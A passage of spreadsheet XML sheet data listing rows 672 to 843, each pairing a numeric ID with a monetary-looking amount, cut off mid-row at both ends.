      <c r="B672" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="673" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A673">
        <v>2076</v>
      </c>
      <c r="B673" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="674" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A674">
        <v>2078</v>
      </c>
      <c r="B674" s="8">
        <v>8000</v>
      </c>
    </row>
    <row r="675" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A675">
        <v>2080</v>
      </c>
      <c r="B675" s="8">
        <v>78000</v>
      </c>
    </row>
    <row r="676" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A676">
        <v>2082</v>
      </c>
      <c r="B676" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="677" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A677">
        <v>2083</v>
      </c>
      <c r="B677" s="8">
        <v>110000</v>
      </c>
    </row>
    <row r="678" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A678">
        <v>2086</v>
      </c>
      <c r="B678" s="8">
        <v>125000</v>
      </c>
    </row>
    <row r="679" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A679">
        <v>2088</v>
      </c>
      <c r="B679" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="680" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A680">
        <v>2097</v>
      </c>
      <c r="B680" s="8">
        <v>3105000</v>
      </c>
    </row>
    <row r="681" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A681">
        <v>2098</v>
      </c>
      <c r="B681" s="8">
        <v>13500</v>
      </c>
    </row>
    <row r="682" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A682">
        <v>2102</v>
      </c>
      <c r="B682" s="8">
        <v>191050</v>
      </c>
    </row>
    <row r="683" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A683">
        <v>2106</v>
      </c>
      <c r="B683" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="684" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A684">
        <v>2107</v>
      </c>
      <c r="B684" s="8">
        <v>1080000</v>
      </c>
    </row>
    <row r="685" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A685">
        <v>2109</v>
      </c>
      <c r="B685" s="8">
        <v>40000000</v>
      </c>
    </row>
    <row r="686" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A686">
        <v>2110</v>
      </c>
      <c r="B686" s="8">
        <v>44000</v>
      </c>
    </row>
    <row r="687" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A687">
        <v>2118</v>
      </c>
      <c r="B687" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="688" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A688">
        <v>2120</v>
      </c>
      <c r="B688" s="8">
        <v>3000</v>
      </c>
    </row>
    <row r="689" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A689">
        <v>2124</v>
      </c>
      <c r="B689" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="690" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A690">
        <v>2126</v>
      </c>
      <c r="B690" s="8">
        <v>49000</v>
      </c>
    </row>
    <row r="691" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A691">
        <v>2127</v>
      </c>
      <c r="B691" s="8">
        <v>2500</v>
      </c>
    </row>
    <row r="692" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A692">
        <v>2129</v>
      </c>
      <c r="B692" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="693" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A693">
        <v>2134</v>
      </c>
      <c r="B693" s="8">
        <v>123000</v>
      </c>
    </row>
    <row r="694" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A694">
        <v>2142</v>
      </c>
      <c r="B694" s="8">
        <v>175000</v>
      </c>
    </row>
    <row r="695" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A695">
        <v>2143</v>
      </c>
      <c r="B695" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="696" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A696">
        <v>2155</v>
      </c>
      <c r="B696" s="8">
        <v>143060</v>
      </c>
    </row>
    <row r="697" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A697">
        <v>2157</v>
      </c>
      <c r="B697" s="8">
        <v>30800</v>
      </c>
    </row>
    <row r="698" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A698">
        <v>2164</v>
      </c>
      <c r="B698" s="8">
        <v>3100</v>
      </c>
    </row>
    <row r="699" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A699">
        <v>2178</v>
      </c>
      <c r="B699" s="8">
        <v>332000</v>
      </c>
    </row>
    <row r="700" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A700">
        <v>2183</v>
      </c>
      <c r="B700" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="701" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A701">
        <v>2186</v>
      </c>
      <c r="B701" s="8">
        <v>1500000</v>
      </c>
    </row>
    <row r="702" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A702">
        <v>2189</v>
      </c>
      <c r="B702" s="8">
        <v>8176521</v>
      </c>
    </row>
    <row r="703" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A703">
        <v>2191</v>
      </c>
      <c r="B703" s="8">
        <v>20500</v>
      </c>
    </row>
    <row r="704" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A704">
        <v>2192</v>
      </c>
      <c r="B704" s="8">
        <v>15000000</v>
      </c>
    </row>
    <row r="705" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A705">
        <v>2196</v>
      </c>
      <c r="B705" s="8">
        <v>700000000</v>
      </c>
    </row>
    <row r="706" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A706">
        <v>2202</v>
      </c>
      <c r="B706" s="8">
        <v>470000</v>
      </c>
    </row>
    <row r="707" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A707">
        <v>2203</v>
      </c>
      <c r="B707" s="8">
        <v>350050</v>
      </c>
    </row>
    <row r="708" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A708">
        <v>2204</v>
      </c>
      <c r="B708" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="709" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A709">
        <v>2205</v>
      </c>
      <c r="B709" s="8">
        <v>1820</v>
      </c>
    </row>
    <row r="710" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A710">
        <v>2206</v>
      </c>
      <c r="B710" s="8">
        <v>650000</v>
      </c>
    </row>
    <row r="711" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A711">
        <v>2207</v>
      </c>
      <c r="B711" s="8">
        <v>485000</v>
      </c>
    </row>
    <row r="712" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A712">
        <v>2209</v>
      </c>
      <c r="B712" s="8">
        <v>3395</v>
      </c>
    </row>
    <row r="713" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A713">
        <v>2213</v>
      </c>
      <c r="B713" s="8">
        <v>957000</v>
      </c>
    </row>
    <row r="714" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A714">
        <v>2217</v>
      </c>
      <c r="B714" s="8">
        <v>70000</v>
      </c>
    </row>
    <row r="715" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A715">
        <v>2229</v>
      </c>
      <c r="B715" s="8">
        <v>48000</v>
      </c>
    </row>
    <row r="716" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A716">
        <v>2231</v>
      </c>
      <c r="B716" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="717" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A717">
        <v>2234</v>
      </c>
      <c r="B717" s="8">
        <v>3700</v>
      </c>
    </row>
    <row r="718" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A718">
        <v>2235</v>
      </c>
      <c r="B718" s="8">
        <v>25000</v>
      </c>
    </row>
    <row r="719" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A719">
        <v>2236</v>
      </c>
      <c r="B719" s="8">
        <v>850000</v>
      </c>
    </row>
    <row r="720" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A720">
        <v>2239</v>
      </c>
      <c r="B720" s="8">
        <v>696600</v>
      </c>
    </row>
    <row r="721" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A721">
        <v>2241</v>
      </c>
      <c r="B721" s="8">
        <v>3620000</v>
      </c>
    </row>
    <row r="722" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A722">
        <v>2242</v>
      </c>
      <c r="B722" s="8">
        <v>3000</v>
      </c>
    </row>
    <row r="723" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A723">
        <v>2243</v>
      </c>
      <c r="B723" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="724" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A724">
        <v>2244</v>
      </c>
      <c r="B724" s="8">
        <v>1601756</v>
      </c>
    </row>
    <row r="725" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A725">
        <v>2245</v>
      </c>
      <c r="B725" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="726" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A726">
        <v>2247</v>
      </c>
      <c r="B726" s="8">
        <v>820200</v>
      </c>
    </row>
    <row r="727" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A727">
        <v>2249</v>
      </c>
      <c r="B727" s="8">
        <v>800000</v>
      </c>
    </row>
    <row r="728" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A728">
        <v>2250</v>
      </c>
      <c r="B728" s="8">
        <v>260</v>
      </c>
    </row>
    <row r="729" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A729">
        <v>2252</v>
      </c>
      <c r="B729" s="8">
        <v>470000</v>
      </c>
    </row>
    <row r="730" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A730">
        <v>2253</v>
      </c>
      <c r="B730" s="8">
        <v>1292921</v>
      </c>
    </row>
    <row r="731" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A731">
        <v>2255</v>
      </c>
      <c r="B731" s="8">
        <v>800000</v>
      </c>
    </row>
    <row r="732" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A732">
        <v>2259</v>
      </c>
      <c r="B732" s="8">
        <v>1500000</v>
      </c>
    </row>
    <row r="733" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A733">
        <v>2266</v>
      </c>
      <c r="B733" s="8">
        <v>21000000</v>
      </c>
    </row>
    <row r="734" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A734">
        <v>2267</v>
      </c>
      <c r="B734" s="8">
        <v>150000</v>
      </c>
    </row>
    <row r="735" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A735">
        <v>2268</v>
      </c>
      <c r="B735" s="8">
        <v>448000</v>
      </c>
    </row>
    <row r="736" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A736">
        <v>2272</v>
      </c>
      <c r="B736" s="8">
        <v>1350000</v>
      </c>
    </row>
    <row r="737" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A737">
        <v>2273</v>
      </c>
      <c r="B737" s="8">
        <v>35000</v>
      </c>
    </row>
    <row r="738" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A738">
        <v>2274</v>
      </c>
      <c r="B738" s="8">
        <v>2000000</v>
      </c>
    </row>
    <row r="739" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A739">
        <v>2275</v>
      </c>
      <c r="B739" s="8">
        <v>55000</v>
      </c>
    </row>
    <row r="740" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A740">
        <v>2276</v>
      </c>
      <c r="B740" s="8">
        <v>40000</v>
      </c>
    </row>
    <row r="741" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A741">
        <v>2277</v>
      </c>
      <c r="B741" s="8">
        <v>230000</v>
      </c>
    </row>
    <row r="742" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A742">
        <v>2278</v>
      </c>
      <c r="B742" s="8">
        <v>479200</v>
      </c>
    </row>
    <row r="743" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A743">
        <v>2281</v>
      </c>
      <c r="B743" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="744" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A744">
        <v>2282</v>
      </c>
      <c r="B744" s="8">
        <v>2420000</v>
      </c>
    </row>
    <row r="745" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A745">
        <v>2284</v>
      </c>
      <c r="B745" s="8">
        <v>41760000</v>
      </c>
    </row>
    <row r="746" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A746">
        <v>2287</v>
      </c>
      <c r="B746" s="8">
        <v>864000</v>
      </c>
    </row>
    <row r="747" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A747">
        <v>2290</v>
      </c>
      <c r="B747" s="8">
        <v>100</v>
      </c>
    </row>
    <row r="748" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A748">
        <v>2293</v>
      </c>
      <c r="B748" s="8">
        <v>180000</v>
      </c>
    </row>
    <row r="749" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A749">
        <v>2295</v>
      </c>
      <c r="B749" s="8">
        <v>520000</v>
      </c>
    </row>
    <row r="750" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A750">
        <v>2296</v>
      </c>
      <c r="B750" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="751" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A751">
        <v>2297</v>
      </c>
      <c r="B751" s="8">
        <v>45000</v>
      </c>
    </row>
    <row r="752" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A752">
        <v>2298</v>
      </c>
      <c r="B752" s="8">
        <v>50000</v>
      </c>
    </row>
    <row r="753" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A753">
        <v>2299</v>
      </c>
      <c r="B753" s="8">
        <v>240000</v>
      </c>
    </row>
    <row r="754" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A754">
        <v>2300</v>
      </c>
      <c r="B754" s="8">
        <v>162000</v>
      </c>
    </row>
    <row r="755" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A755">
        <v>2302</v>
      </c>
      <c r="B755" s="8">
        <v>360000</v>
      </c>
    </row>
    <row r="756" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A756">
        <v>2304</v>
      </c>
      <c r="B756" s="8">
        <v>21000</v>
      </c>
    </row>
    <row r="757" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A757">
        <v>2306</v>
      </c>
      <c r="B757" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="758" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A758">
        <v>2308</v>
      </c>
      <c r="B758" s="8">
        <v>21000</v>
      </c>
    </row>
    <row r="759" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A759">
        <v>2309</v>
      </c>
      <c r="B759" s="8">
        <v>936000</v>
      </c>
    </row>
    <row r="760" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A760">
        <v>2310</v>
      </c>
      <c r="B760" s="8">
        <v>15000</v>
      </c>
    </row>
    <row r="761" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A761">
        <v>2313</v>
      </c>
      <c r="B761" s="8">
        <v>1440</v>
      </c>
    </row>
    <row r="762" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A762">
        <v>2314</v>
      </c>
      <c r="B762" s="8">
        <v>25000</v>
      </c>
    </row>
    <row r="763" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A763">
        <v>2317</v>
      </c>
      <c r="B763" s="8">
        <v>292350.2</v>
      </c>
    </row>
    <row r="764" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A764">
        <v>2318</v>
      </c>
      <c r="B764" s="8">
        <v>140</v>
      </c>
    </row>
    <row r="765" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A765">
        <v>2321</v>
      </c>
      <c r="B765" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="766" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A766">
        <v>2323</v>
      </c>
      <c r="B766" s="8">
        <v>522000</v>
      </c>
    </row>
    <row r="767" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A767">
        <v>2324</v>
      </c>
      <c r="B767" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="768" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A768">
        <v>2325</v>
      </c>
      <c r="B768" s="8">
        <v>2200000</v>
      </c>
    </row>
    <row r="769" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A769">
        <v>2331</v>
      </c>
      <c r="B769" s="8">
        <v>862500</v>
      </c>
    </row>
    <row r="770" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A770">
        <v>2332</v>
      </c>
      <c r="B770" s="8">
        <v>880000</v>
      </c>
    </row>
    <row r="771" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A771">
        <v>2335</v>
      </c>
      <c r="B771" s="8">
        <v>750</v>
      </c>
    </row>
    <row r="772" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A772">
        <v>2337</v>
      </c>
      <c r="B772" s="8">
        <v>617000</v>
      </c>
    </row>
    <row r="773" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A773">
        <v>2339</v>
      </c>
      <c r="B773" s="8">
        <v>600</v>
      </c>
    </row>
    <row r="774" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A774">
        <v>2340</v>
      </c>
      <c r="B774" s="8">
        <v>375000</v>
      </c>
    </row>
    <row r="775" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A775">
        <v>2341</v>
      </c>
      <c r="B775" s="8">
        <v>6000000</v>
      </c>
    </row>
    <row r="776" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A776">
        <v>2342</v>
      </c>
      <c r="B776" s="8">
        <v>12000</v>
      </c>
    </row>
    <row r="777" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A777">
        <v>2344</v>
      </c>
      <c r="B777" s="8">
        <v>68000000</v>
      </c>
    </row>
    <row r="778" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A778">
        <v>2345</v>
      </c>
      <c r="B778" s="8">
        <v>1300000</v>
      </c>
    </row>
    <row r="779" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A779">
        <v>2346</v>
      </c>
      <c r="B779" s="8">
        <v>132000</v>
      </c>
    </row>
    <row r="780" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A780">
        <v>2347</v>
      </c>
      <c r="B780" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="781" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A781">
        <v>2353</v>
      </c>
      <c r="B781" s="8">
        <v>1100000</v>
      </c>
    </row>
    <row r="782" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A782">
        <v>2355</v>
      </c>
      <c r="B782" s="8">
        <v>3092591000</v>
      </c>
    </row>
    <row r="783" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A783">
        <v>2359</v>
      </c>
      <c r="B783" s="8">
        <v>150000</v>
      </c>
    </row>
    <row r="784" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A784">
        <v>2361</v>
      </c>
      <c r="B784" s="8">
        <v>9133000</v>
      </c>
    </row>
    <row r="785" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A785">
        <v>2362</v>
      </c>
      <c r="B785" s="8">
        <v>363000</v>
      </c>
    </row>
    <row r="786" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A786">
        <v>2367</v>
      </c>
      <c r="B786" s="8">
        <v>260000</v>
      </c>
    </row>
    <row r="787" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A787">
        <v>2368</v>
      </c>
      <c r="B787" s="8">
        <v>400</v>
      </c>
    </row>
    <row r="788" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A788">
        <v>2379</v>
      </c>
      <c r="B788" s="8">
        <v>71100</v>
      </c>
    </row>
    <row r="789" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A789">
        <v>2390</v>
      </c>
      <c r="B789" s="8">
        <v>6210000</v>
      </c>
    </row>
    <row r="790" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A790">
        <v>2429</v>
      </c>
      <c r="B790" s="8">
        <v>1850000</v>
      </c>
    </row>
    <row r="791" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A791">
        <v>2521</v>
      </c>
      <c r="B791" s="8">
        <v>6000</v>
      </c>
    </row>
    <row r="792" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A792">
        <v>2522</v>
      </c>
      <c r="B792" s="8">
        <v>350000</v>
      </c>
    </row>
    <row r="793" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A793">
        <v>2524</v>
      </c>
      <c r="B793" s="8">
        <v>50000</v>
      </c>
    </row>
    <row r="794" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A794">
        <v>2525</v>
      </c>
      <c r="B794" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="795" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A795">
        <v>2526</v>
      </c>
      <c r="B795" s="8">
        <v>3600000</v>
      </c>
    </row>
    <row r="796" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A796">
        <v>2528</v>
      </c>
      <c r="B796" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="797" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A797">
        <v>2532</v>
      </c>
      <c r="B797" s="8">
        <v>16800</v>
      </c>
    </row>
    <row r="798" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A798">
        <v>2533</v>
      </c>
      <c r="B798" s="8">
        <v>10600</v>
      </c>
    </row>
    <row r="799" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A799">
        <v>2537</v>
      </c>
      <c r="B799" s="8">
        <v>108000</v>
      </c>
    </row>
    <row r="800" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A800">
        <v>2538</v>
      </c>
      <c r="B800" s="8">
        <v>320200</v>
      </c>
    </row>
    <row r="801" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A801">
        <v>2541</v>
      </c>
      <c r="B801" s="8">
        <v>155000</v>
      </c>
    </row>
    <row r="802" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A802">
        <v>2545</v>
      </c>
      <c r="B802" s="8">
        <v>700000</v>
      </c>
    </row>
    <row r="803" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A803">
        <v>2546</v>
      </c>
      <c r="B803" s="8">
        <v>260000</v>
      </c>
    </row>
    <row r="804" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A804">
        <v>2547</v>
      </c>
      <c r="B804" s="8">
        <v>43781.9</v>
      </c>
    </row>
    <row r="805" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A805">
        <v>2550</v>
      </c>
      <c r="B805" s="8">
        <v>1280000</v>
      </c>
    </row>
    <row r="806" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A806">
        <v>2553</v>
      </c>
      <c r="B806" s="8">
        <v>1455000</v>
      </c>
    </row>
    <row r="807" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A807">
        <v>2554</v>
      </c>
      <c r="B807" s="8">
        <v>40000</v>
      </c>
    </row>
    <row r="808" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A808">
        <v>2555</v>
      </c>
      <c r="B808" s="8">
        <v>1050000</v>
      </c>
    </row>
    <row r="809" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A809">
        <v>2557</v>
      </c>
      <c r="B809" s="8">
        <v>645000</v>
      </c>
    </row>
    <row r="810" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A810">
        <v>2558</v>
      </c>
      <c r="B810" s="8">
        <v>3215000</v>
      </c>
    </row>
    <row r="811" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A811">
        <v>2559</v>
      </c>
      <c r="B811" s="8">
        <v>1380000</v>
      </c>
    </row>
    <row r="812" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A812">
        <v>2560</v>
      </c>
      <c r="B812" s="8">
        <v>1249193.25</v>
      </c>
    </row>
    <row r="813" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A813">
        <v>2561</v>
      </c>
      <c r="B813" s="8">
        <v>3000000</v>
      </c>
    </row>
    <row r="814" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A814">
        <v>2562</v>
      </c>
      <c r="B814" s="8">
        <v>38881451</v>
      </c>
    </row>
    <row r="815" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A815">
        <v>2563</v>
      </c>
      <c r="B815" s="8">
        <v>12000</v>
      </c>
    </row>
    <row r="816" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A816">
        <v>2564</v>
      </c>
      <c r="B816" s="8">
        <v>450000</v>
      </c>
    </row>
    <row r="817" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A817">
        <v>2569</v>
      </c>
      <c r="B817" s="8">
        <v>3500</v>
      </c>
    </row>
    <row r="818" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A818">
        <v>2571</v>
      </c>
      <c r="B818" s="8">
        <v>220000</v>
      </c>
    </row>
    <row r="819" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A819">
        <v>2572</v>
      </c>
      <c r="B819" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="820" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A820">
        <v>2573</v>
      </c>
      <c r="B820" s="8">
        <v>225000</v>
      </c>
    </row>
    <row r="821" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A821">
        <v>2574</v>
      </c>
      <c r="B821" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="822" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A822">
        <v>2576</v>
      </c>
      <c r="B822" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="823" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A823">
        <v>2577</v>
      </c>
      <c r="B823" s="8">
        <v>1553000</v>
      </c>
    </row>
    <row r="824" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A824">
        <v>2578</v>
      </c>
      <c r="B824" s="8">
        <v>312000</v>
      </c>
    </row>
    <row r="825" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A825">
        <v>2579</v>
      </c>
      <c r="B825" s="8">
        <v>1232000</v>
      </c>
    </row>
    <row r="826" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A826">
        <v>2580</v>
      </c>
      <c r="B826" s="8">
        <v>700000</v>
      </c>
    </row>
    <row r="827" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A827">
        <v>2581</v>
      </c>
      <c r="B827" s="8">
        <v>325000</v>
      </c>
    </row>
    <row r="828" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A828">
        <v>2583</v>
      </c>
      <c r="B828" s="8">
        <v>1000635000</v>
      </c>
    </row>
    <row r="829" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A829">
        <v>2586</v>
      </c>
      <c r="B829" s="8">
        <v>1000635000</v>
      </c>
    </row>
    <row r="830" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A830">
        <v>2590</v>
      </c>
      <c r="B830" s="8">
        <v>1550000</v>
      </c>
    </row>
    <row r="831" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A831">
        <v>2591</v>
      </c>
      <c r="B831" s="8">
        <v>123750</v>
      </c>
    </row>
    <row r="832" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A832">
        <v>2594</v>
      </c>
      <c r="B832" s="8">
        <v>172000</v>
      </c>
    </row>
    <row r="833" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A833">
        <v>2596</v>
      </c>
      <c r="B833" s="8">
        <v>150000</v>
      </c>
    </row>
    <row r="834" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A834">
        <v>2597</v>
      </c>
      <c r="B834" s="8">
        <v>303000000</v>
      </c>
    </row>
    <row r="835" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A835">
        <v>2598</v>
      </c>
      <c r="B835" s="8">
        <v>1680</v>
      </c>
    </row>
    <row r="836" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A836">
        <v>2600</v>
      </c>
      <c r="B836" s="8">
        <v>1755827</v>
      </c>
    </row>
    <row r="837" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A837">
        <v>2601</v>
      </c>
      <c r="B837" s="8">
        <v>700</v>
      </c>
    </row>
    <row r="838" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A838">
        <v>2602</v>
      </c>
      <c r="B838" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="839" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A839">
        <v>2604</v>
      </c>
      <c r="B839" s="8">
        <v>1000500</v>
      </c>
    </row>
    <row r="840" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A840">
        <v>2605</v>
      </c>
      <c r="B840" s="8">
        <v>800000</v>
      </c>
    </row>
    <row r="841" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A841">
        <v>2607</v>
      </c>
      <c r="B841" s="8">
        <v>2400</v>
      </c>
    </row>
    <row r="842" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A842">
        <v>2608</v>
      </c>
      <c r="B842" s="8">
        <v>4640300</v>
      </c>
    </row>
    <row r="843" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A843">
        <v>2609</v>
      </c>
      <c r="B843" s="8">
        <v>425500</v>
      </c>
    </row>
    <row r="844" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A844">
